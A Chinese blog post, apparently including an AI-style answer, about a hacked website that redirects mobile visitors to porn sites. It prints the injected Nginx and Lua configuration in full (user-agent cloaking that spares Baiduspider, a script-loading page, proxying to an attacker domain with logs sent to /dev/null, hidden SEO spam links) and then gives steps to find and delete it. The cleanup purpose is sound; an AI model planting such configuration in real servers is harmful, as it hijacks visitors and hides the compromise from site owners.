网站被黑,文件访问,手机端就会跳出黄色网站。
off999 2025-10-02 06:04 22 浏览 0 评论
下面是黑客窜改的代码:
location ~* /.*am.* {
set $mobile 0;
if ($http_user_agent ~* '(Android|webos|iphone|ipad|ipod|blackberry|iemobile|opera mini)') {
set $mobile 1;
}
if ($http_user_agent ~* 'Baiduspider') {
set $mobile 0;
}
if ($request_uri ~* ".*am.*") {
set $mobile "${mobile}1";
}
if ($mobile = "11") {
add_header Content-Type "text/html";
return 200 '<!DOCTYPE html><html><head><meta charset="utf-8"></head><body><script src="被挂上的HS网站.js"></script></body></html>';
}
rewrite ^ /news.php?lj=$request_uri&hh=$remote_addr&ym=$host break;
proxy_pass http://mulucdn1.XXXXXXX.com;
proxy_set_header Host mulucdn1.XXXXXX.com;
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
proxy_set_header REMOTE-HOST $host;
access_log /dev/null;
error_log /dev/null;
}
set_by_lua $pkac '
local rank_str = [[<div style="width: 2px; height: 2px: 0;display: none !important;visibility: hidden !important;">]]
local huozui = {".shtml",".html"}
local pdir = {"amxw"}
local ldir = {"news","show","info","read","list"}
math.randomseed(os.time())
for i=1,10 do
rank_str=rank_str..[[<a href="/]]..pdir[math.random(#pdir)]..[[/]]..math.random(100000, 99999999)..huozui[math.random(#huozui)]..[["></a>]]
end
rank_str=rank_str..[[</div>]]
local useragent = ngx.var.http_user_agent
local req_uri = ngx.var.request_uri
if string.find(req_uri, "fy") then
return ""
end
if ngx.var.spider == "01" or ngx.var.spider == "012" then
return rank_str
else
return ""
end';
sub_filter '</head>' '${pkac}</head>';
你提供的这段代码,就是直接导致网站跳黄色网站的恶意配置!里面藏了多个 “陷阱”,咱们一点点拆穿,然后彻底删除:
一、先看懂这些恶意代码在做什么(3 个关键陷阱)
- “条件跳转陷阱”(专门针对手机用户):
- nginx
- # 当访问的URL包含"am"(比如xxx/amxxx),且是手机访问时 if ($mobile = "11") { # 直接返回那段带恶意脚本的HTML(就是你看到的跳转代码) return 200 '<!DOCTYPE html><html>...<script src="https://upload.XXXXX.com/a78.js"></script></body></html>'; }
- 这就是为什么手机访问时会跳黄色网站的直接原因!
- “偷偷转发陷阱”:
- nginx
- proxy_pass http://mulucdn1.XXXXXX.com; # 把请求转发到恶意域名 proxy_set_header Host mulucdn1.XXXXXX.com;
- 即使不触发上面的条件,也会把访问偷偷转发到恶意网站,相当于 “双重保险” 让你跳走。
- “页面污染陷阱”(用 Lua 代码插入垃圾链接):
- 那段set_by_lua代码会在网页里偷偷插入大量隐藏的恶意链接(比如/amxw/123456.html),目的是污染你的网站内容,甚至可能被搜索引擎惩罚。
二、解决步骤:彻底删除这些恶意代码(按步骤来,超简单)
这些代码肯定藏在某个 Nginx 配置文件里(之前提到的extension文件夹里的.conf,或uwsgi_params.conf),按下面步骤找出来删掉:
第一步:找到包含这些恶意代码的文件
- 打开宝塔→「文件」;
- 按之前的路径找最可能的地方:优先查:/www/server/panel/vhost/nginx/extension/www.*****你的网站网址***.com/(里面的所有.conf 文件);其次查:/www/server/nginx/conf/uwsgi_params.conf(之前日志报错的文件);
- 每个文件点「编辑」→按「Ctrl+F」搜 “XXXXXX.com”(一秒定位恶意代码)。
第二步:删除所有恶意代码(关键!别留任何一句)
找到包含上面代码的文件后,删除以下所有内容:
- 整个location ~* /.*am.* { ... }块(从location ~* /.*am.* {开始,到对应的}结束,包括里面的所有代码);
- 整个set_by_lua $pkac '...';行(就是那段带 Lua 代码的长句子);
- 最后一行sub_filter '</head>' '${pkac}</head>';(这行在偷偷改你的网页内容)。
删完后,文件里应该看不到任何 “XXXXXX.com”“XXXX.js”“XXXXXXX” 相关的内容。
第三步:保存并重启,验证效果
- 删完后点「保存」;
- 宝塔→「服务」→重启「Nginx」和「PHP-8.2」;
- 用手机「无痕模式」访问之前的 CSS 链接,以及任何带 “am” 的 URL(比如假设你的网站有xxx/amxxx路径):正常情况下,会显示你的网站内容,不再跳黄色网站;查看网页源代码(手机浏览器里点「查看源代码」),也不会有<script src="https://upload.XXXXXX.com/a78.js"></script>这段代码了。
三、最后检查:确保没有漏网之鱼
黑客可能在多个文件里加了类似代码,再做一次全局搜索:
- 宝塔→「文件」→进入你的网站根目录或 Nginx 配置目录;
- 点「搜索」→搜内容 “XXXXXX.com”→范围选 “所有子目录”;
- 任何搜到的文件,都按第二步的方法删除恶意代码,确保彻底清除。
这些代码就是导致跳转的 “罪魁祸首”,只要彻底删除,问题就能解决!如果找不到文件或不确定删哪些,截个图把文件内容发给我,我帮你标出来~
相关推荐
- Kubernetes 核心概念全景图:Pod、Node、Cluster、Control Plane 等
-
想真正读懂Kubernetes的底层运作,你必须理解它的“权力架构”。Pod是什么?Node是什么?ControlPlane又是做什么的?它们之间有什么关系?怎么协同工作?本篇带你构建一个...
- Helm 实战:用 Helm 部署一个 Nginx 应用
-
这一篇,我们将动手实战:用Helm从零部署一个Nginx应用,并掌握HelmChart的结构和参数化技巧。一、准备环境在开始之前,你需要确保环境中具备以下工具:已部署的Kubernet...
- 从零开始:如何在 Linux 上搭建 Nginx + Node.js 高性能 Web 服务
-
在现代互联网服务架构中,Nginx+Node.js已成为轻量级、高性能网站的首选组合。本文将带你从零开始,一步步搭建一个高并发、高可用的Web服务平台,让新手也能轻松掌握生产级部署思路。一、...
- NetBox 最新版 4.4.1 完整安装指南
-
NetBox最新版4.4.1完整安装指南(修正版)by大牛蛙1.系统准备#关闭SELinux和防火墙(仅测试环境)systemctldisable--nowfirewalldse...
- Termux 安装 linux 宝塔面板,搭建 Nginx+PHP+Mysql web 网站环境
-
Termux安装linux宝塔面板,搭建Nginx+PHP+Mysqlweb服务环境,解决启动故障奶妈级教程1.到宝塔面板官网:https://www.bt.cn/new/download...
- OpenEuler系统安装Nginx安装配置_openwrt安装nginx
-
NginxWEB安装时可以指定很多的模块,默认需要安装Rewrite模块,也即是需要系统有PCRE库,安装Pcre支持Rewrite功能。如下为安装NginxWEB服务器方法:源码的路径,而不是编...
- 多级缓存架构实战:从OpenResty到Redis,打造毫秒级响应系统
-
在传统的Web架构中,当用户发起请求时,应用通常会直接查询数据库。这种模式在低并发场景下尚可工作,但当流量激增时,数据库很容易成为性能瓶颈。多级缓存通过在数据路径的不同层级设置缓存,可以显著降低数据库...
- 如何使用 Nginx 缓存提高网站性能 ?
-
快速加载的站点提供了更好的用户体验并且可以拥有更高的搜索引擎排名。通过Nginx缓存提高你的网站性能是一个有效的方法。Nginx是一个流行的开源web服务器,也可以作为web服务器反向代...
- 如何构建企业级Docker Registry Server
-
很多人问我,虚拟机镜像和docker镜像的区别是什么?其实区别非常明显,我们可以通过阅读Dockerfile文件就可以知道这个镜像都做了哪些操作,能提供什么服务;但通过虚拟机镜像,你能一眼看出来虚拟机...
- 如何解决局域网SSL证书问题?使用mkcert证书生成工具轻松搞定
-
“局域网里弹出‘不安全’红锁,老板就在身后盯着演示,那一刻只想原地消失。”别笑,九成前端都经历过。自签证书被Chrome标红,客户以为网站被黑,其实只是缺一张被信任的证。mkcert把这事从半小时缩到...
- Docker 安全与权限控制:别让你的容器变成“漏洞盒子”
-
在享受容器带来的轻量与灵活的同时,我们也必须面对一个现实问题:安全隐患。容器并不是天然安全,错误配置甚至可能让攻击者“越狱”入侵主机!本篇将带你从多个层面强化Docker的安全防护,构建真正可放心...
- Kubernetes生产级管理指南(2025版)
-
在云原生技术持续演进的2025年,Kubernetes已成为企业数字化转型的核心引擎。然而,生产环境中的集群管理仍面临基础设施配置、安全漏洞、运维复杂度攀升等挑战。本文将结合最新行业实践,从基础设施即...
- 云原生工程师日常使用最多的工具和100条高频命令
-
在云原生时代,工程师不仅要熟悉容器化、编排和服务网格,还要掌握大量工具和命令来进行日常运维与开发。本文将从工具篇和命令篇两个角度,详细介绍云原生工程师每天都会用到的核心技能。一、云原生工程师常...
- 用 Jenkins 实现自动化 CI/CD_jenkins api自动执行
-
场景设定(可替换为你的技术栈)语言:Node.js(示例简单,任何语言思路一致)制品:Docker镜像(推送到DockerHub/Harbor)运行环境:Kubernetes(staging...
- 5款好用开源云笔记虚拟主机部署项目推荐
-
在个人数据管理与协同办公场景中,开源云笔记项目凭借可自主部署、数据可控的优势,成为众多用户的首选。以下推荐5款适配虚拟主机部署、功能完善的开源项目,附核心特性与部署要点,助力快速搭建专属云笔记系统。...
你 发表评论:
欢迎- 一周热门
- 最近发表
-
- Kubernetes 核心概念全景图:Pod、Node、Cluster、Control Plane 等
- Helm 实战:用 Helm 部署一个 Nginx 应用
- 从零开始:如何在 Linux 上搭建 Nginx + Node.js 高性能 Web 服务
- NetBox 最新版 4.4.1 完整安装指南
- Termux 安装 linux 宝塔面板,搭建 Nginx+PHP+Mysql web 网站环境
- OpenEuler系统安装Nginx安装配置_openwrt安装nginx
- 多级缓存架构实战:从OpenResty到Redis,打造毫秒级响应系统
- 如何使用 Nginx 缓存提高网站性能 ?
- 如何构建企业级Docker Registry Server
- 如何解决局域网SSL证书问题?使用mkcert证书生成工具轻松搞定
- 标签列表
-
- python计时 (73)
- python安装路径 (56)
- python类型转换 (93)
- python进度条 (67)
- python吧 (67)
- python的for循环 (65)
- python格式化字符串 (61)
- python静态方法 (57)
- python列表切片 (59)
- python面向对象编程 (60)
- python 代码加密 (65)
- python串口编程 (77)
- python封装 (57)
- python写入txt (66)
- python读取文件夹下所有文件 (59)
- python操作mysql数据库 (66)
- python获取列表的长度 (64)
- python接口 (63)
- python调用函数 (57)
- python多态 (60)
- python匿名函数 (59)
- python打印九九乘法表 (65)
- python赋值 (62)
- python异常 (69)
- python元祖 (57)